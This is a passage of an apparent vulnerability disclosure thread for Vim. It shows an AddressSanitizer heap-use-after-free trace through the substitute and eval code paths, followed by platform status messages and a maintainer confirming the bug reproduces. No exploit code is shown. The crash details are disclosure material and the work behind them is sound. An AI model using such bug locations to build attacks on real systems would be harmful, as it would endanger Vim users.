#3 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#4 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#5 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#6 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#7 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#8 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#9 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#10 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#11 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#12 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#13 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#14 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#15 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#16 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#17 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#18 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#19 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#20 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#21 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#22 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#23 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#24 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#25 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#26 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#27 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#28 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#29 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#30 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#31 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#32 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#33 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#34 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#35 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#36 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
previously allocated by thread T0 here:
#0 0x49720d in malloc (/home/alkyne/fuzzing/vim-asan/src/vim+0x49720d)
#1 0x4c6d47 in lalloc /home/alkyne/fuzzing/vim-asan/src/alloc.c:248:11
#2 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#3 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#4 0xa71e3d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
#5 0xa704cd in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
#6 0xa704cd in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
#7 0xd97f97 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
#8 0xd97f97 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
#9 0xd955a9 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
#10 0x7fec9dfe80b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/alkyne/fuzzing/vim-asan/src/charset.c:1474:12 in skipwhite
Shadow bytes around the buggy address:
0x0c0c7fff8180: fa fa fa fa 00 00 00 00 00 00 03 fa fa fa fa fa
0x0c0c7fff8190: 00 00 00 00 00 00 06 fa fa fa fa fa 00 00 00 00
0x0c0c7fff81a0: 00 00 04 fa fa fa fa fa 00 00 00 00 00 00 00 fa
0x0c0c7fff81b0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c0c7fff81c0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd
=>0x0c0c7fff81d0: fd fd[fd]fd fa fa fa fa 00 00 00 00 00 00 07 fa
0x0c0c7fff81e0: fa fa fa fa 00 00 00 00 00 00 07 fa fa fa fa fa
0x0c0c7fff81f0: 00 00 00 00 00 00 07 fa fa fa fa fa 00 00 00 00
0x0c0c7fff8200: 00 00 07 fa fa fa fa fa 00 00 00 00 00 00 07 fa
0x0c0c7fff8210: fa fa fa fa 00 00 00 00 00 00 07 fa fa fa fa fa
0x0c0c7fff8220: 00 00 00 00 00 00 07 fa fa fa fa fa 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==6580==ABORTING
We are processing your report and will contact the
vim
team within 24 hours.
a year ago
We have contacted a member of the
vim
team and are waiting to hear back
a year ago
I can reproduce the problem. the POC can be further simplified, I'll use that in a test. Next time, please try to reduce the POC as much as you can to save time.
to join this conversation